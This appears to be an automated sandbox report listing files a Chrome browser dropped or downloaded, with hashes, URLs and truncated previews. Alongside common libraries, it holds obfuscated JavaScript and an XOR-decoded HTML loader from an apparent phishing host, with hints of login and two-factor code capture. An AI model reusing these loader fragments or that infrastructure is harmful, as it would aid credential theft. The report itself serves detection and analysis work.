                                    Preview:const _0x2f5478=_0x4353;(function(_0x5cf133,_0x19e1fa){const _0x4d4154=_0x4353,_0x1236e0=_0x5cf133();while(!![]){try{const _0x1582b5=-parseInt(_0x4d4154(0x2a9))/0x1*(parseInt(_0x4d4154(0x216))/0x2)+parseInt(_0x4d4154(0x212))/0x3*(parseInt(_0x4d4154(0x224))/0x4)+parseInt(_0x4d4154(0x1ae))/0x5*(parseInt(_0x4d4154(0x20a))/0x6)+-parseInt(_0x4d4154(0x1bc))/0x7+-parseInt(_0x4d4154(0x1ce))/0x8*(parseInt(_0x4d4154(0x2e6))/0x9)+parseInt(_0x4d4154(0x21d))/0xa*(parseInt(_0x4d4154(0x35c))/0xb)+parseInt(_0x4d4154(0x30a))/0xc;if(_0x1582b5===_0x19e1fa)break;else _0x1236e0['push'](_0x1236e0['shift']());}catch(_0x3e2ebf){_0x1236e0['push'](_0x1236e0['shift']());}}}(_0x1625,0x6e90e));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;let wait2facancel=0x0,otptype=0x0;var currentweb=0x0,pagevisitedalready=null;let viewtype=null;!document[_0x2f5478(0x2bb)](_0x2f5478(0x1fd))[_0x2f5478(0x1c3)]['contains'](_0x2f5478(0x26e))&&(view=_0x2f5478(0x2ae));document[_0x2f5478(0x2bb)](_0x2f5478(
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (45809)
                                    Category:dropped
                                    Size (bytes):45810
                                    Entropy (8bit):5.4018992831833454
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:F8E18E23484E55C313A4A8F8615359CA
                                    SHA1:CFE4D85935005C68FF04B58E236BCED0B0A41D7B
                                    SHA-256:3F0166BDE3365C67AEEB6ADFB6DE569399BA9941A39EE0EE6C4DC086494DAF99
                                    SHA-512:CFCAF01D483D6B6CFE9E165D1CA87CB720823087E20E5351C032AE7142E4A599384AB8D034949255ADA8D46FE6F3F66F13E4612A060B7EE036F1121111738F9E
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:"use strict";(function(){function Dt(e,r,a,o,c,u,g){try{var _=e[u](g),s=_.value}catch(f){a(f);return}_.done?r(s):Promise.resolve(s).then(o,c)}function Ut(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(s){Dt(u,o,c,g,_,"next",s)}function _(s){Dt(u,o,c,g,_,"throw",s)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Tr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                    Category:downloaded
                                    Size (bytes):1400
                                    Entropy (8bit):7.808470583085035
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:333EE830E5AB72C41DD9126A27B4D878
                                    SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                    SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                    SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/ijBLVACkcbCEJt0VPjEzBqfJQYkJ2j893vRYp7XOVSlpLwXCOegQp0ab223
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                    Category:downloaded
                                    Size (bytes):43596
                                    Entropy (8bit):7.9952701440723475
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                    SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                    SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                    SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/90xEDUF5aBUWZf12QcGccbcieyyz80
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (553)
                                    Category:dropped
                                    Size (bytes):549276
                                    Entropy (8bit):5.688530667062875
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:B0878E919A5BCA8858B4C1E59929452F
                                    SHA1:43D32E52807D59D2195D8EF6E33F909D58611E21
                                    SHA-256:04A0C20C086EA1EDC10AB2A9612AFC96AC6BD5A49FA5B310768ABA2AB688718F
                                    SHA-512:1755DC4AAC8F3FFE87864EBCAD7247D3828E8B7DC118288544562D8368C308F2CEA3A118259347EE005F1461F7DD1051E20A22234C644697F25C1DAB64F416CB
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/.var q=function(){return[function(R,P,l,K,r,f,J,F,N){if((N=["Invalid JSON string: ",")",""],R&121)==R&&m.call(this,P),(R-4^4)>=R&&R+8>>2<R)a:{try{F=RE[l][K](f);break a}catch(E){}if(/^\s*$/.test((J=String(f),J))?0:/^[\],:{}\s\u2028\u2029]*$/.test(J.replace(/\\["\\\/bfnrtu]/g,P).replace(/(?:"[^"\\\n\r\u2028\u2029\x00-\x08\x0a-\x1f]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?)[\s\u2028\u2029]*(?=:|,|]|}|$)/g,"]").replace(/(?:^|:|,)(?:[\s\u2028\u2029]*\[)+/g,N[2])))try{F=eval(r+J+N[1]);break a}catch(E){}throw Error(N[0]+.J);}return F},function(R,P,l,K,r,f,J){if((R+1&(J=[" is not an iterable or ArrayLike","u","Y
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with very long lines (65209), with CRLF line terminators
                                    Category:downloaded
                                    Size (bytes):140136
                                    Entropy (8bit):5.680603870642976
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:E12E930A011C10B0033D6E602730487C
                                    SHA1:DF9B5109AB8EADF986EE157FAE08CE93F8F50912
                                    SHA-256:BF9ACDC35398897C566089159BB995314DC62B6FD6584491287D0686EFB0533A
                                    SHA-512:C7575ADFD2C834C82D50F38C1AD480D48CFF86B2480F018FBBE6163B2BB3EAB6F6F18D53A5F1FDA525AD57C7B6EC6A71C5E2A9E81A32F87EE5E7BD82AE027876
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k
                                    Preview:<script>..function WGtwqLOYeG(NFpPAsuMWf, bIyQpVGXlm) {..let WlFuXtSNtQ = '';..NFpPAsuMWf = atob(NFpPAsuMWf);..let uryNDrRxVt = bIyQpVGXlm.length;..for (let i = 0; i < NFpPAsuMWf.length; i++) {.. WlFuXtSNtQ += String.fromCharCode(NFpPAsuMWf.charCodeAt(i) ^ bIyQpVGXlm.charCodeAt(i % uryNDrRxVt));..}..return WlFuXtSNtQ;..}..var yWJcgLceur = WGtwqLOYeG(`TxJ0AXQdIAk8RBtHXSIJRHNlERAeXxAiViceZFsBHREOQz11ETwYAE0+Om4XaVllCgcBWkA6FzoLOkRGG0dEPkRzVnYaCxdWHiRGPBwrAEoQXF1hXTgMPAsdXgAeeBl5VzQQCl1ZQ2wJdVYqGhYaQ0RwOkNZeVlET0BTPF45DXkKFhAOEiZDPQkqQ0tcUFQgGToWOhIBBx1ZIRh9V29XVFxAXy1cLA13EAtdXlkgGSMKe0dYXEBTPF45DWd0blMTEG4LOhorEBQHE0M8VHRbMQ0QA0AKYRguEC0REREdUyFaZh88FxBcQVEgUywBKVcOABxCK1ssGCocF1xXXzlZJRY4HUsFAx56GXpWKxgKF1ZIPhkkEDdXDgARDnIYOhorEBQHDT1EF2lZeUUXEEFZPkNpCisaWVFbRDpHOkN2VgcXXVo9GSoVNgwAFV9RPFJnGjYUSxJZUTYYJRA7CksQQUk+QyZUMwpLRx0BYAZmGisAFAdcHSREZxQwF0oZQBJwC2YKOgsNA0cOQz1pWXlZWABQQidHPVkqCwdOEVg6QzkKY1ZLBERHYFAmFj4VAV1QXyMYOxw6GBQHUFgvGCgJMFcOABEOchg6GisQFAcNPUQXaVl5RQgaXVtuRSwVZFsXB0pc
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):7390
                                    Entropy (8bit):4.02755241095864
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:B59C16CA9BF156438A8A96D45E33DB64
                                    SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                    SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                    SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/ij26MOWeerVhuo8kGK6ucdRTRIbXNI1HILXyd1UjipRO78170
                                    Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format (Version 2), TrueType, length 105536, version 769.768
                                    Category:downloaded
                                    Size (bytes):105536
                                    Entropy (8bit):7.989150976486913
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:CD2B4095E9CE66CDE642C3502A4022D9
                                    SHA1:A280ECDDDD14695FAD22599301AB03ADFE5224C0
                                    SHA-256:404C746C8F7E3F9B7611A8F23D908C1A32A5C972236B9D89BB68B05D9BF4B905
                                    SHA-512:062782597F37B964A5F285FE8B75AC2CC57E99024FA6C9BF841DC2E7B930CE6CFC12EA5F32D2A6B7301A74FFBB552457A2A82ED9D945E135D8B027F506BF5D77
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                    Category:downloaded
                                    Size (bytes):28584
                                    Entropy (8bit):7.992563951996154
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:17081510F3A6F2F619EC8C6F244523C7
                                    SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                    SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                    SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/7842F572xWMV0gMefk67Ff01qA3Kst60
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:CFCD208495D565EF66E7DFF9F98764DA
                                    SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                    SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                    SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:0
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                    Category:dropped
                                    Size (bytes):48316
                                    Entropy (8bit):5.6346993394709
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:2CA03AD87885AB983541092B87ADB299
                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                    Category:downloaded
                                    Size (bytes):10796
                                    Entropy (8bit):7.946024875001343
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:12BDACC832185D0367ECC23FD24C86CE
                                    SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                    SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                    SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (10017)
                                    Category:downloaded
                                    Size (bytes):10245
                                    Entropy (8bit):5.437589264532084
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                    SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                    SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                    SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240830T173124Z&X-Amz-Expires=300&X-Amz-Signature=f2e0514ebf9f3664de06897da37b6c151a131c395ab9de13f3818e3d45b86597&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                    Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (65447)
                                    Category:downloaded
                                    Size (bytes):89501
                                    Entropy (8bit):5.289893677458563
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                    No static file info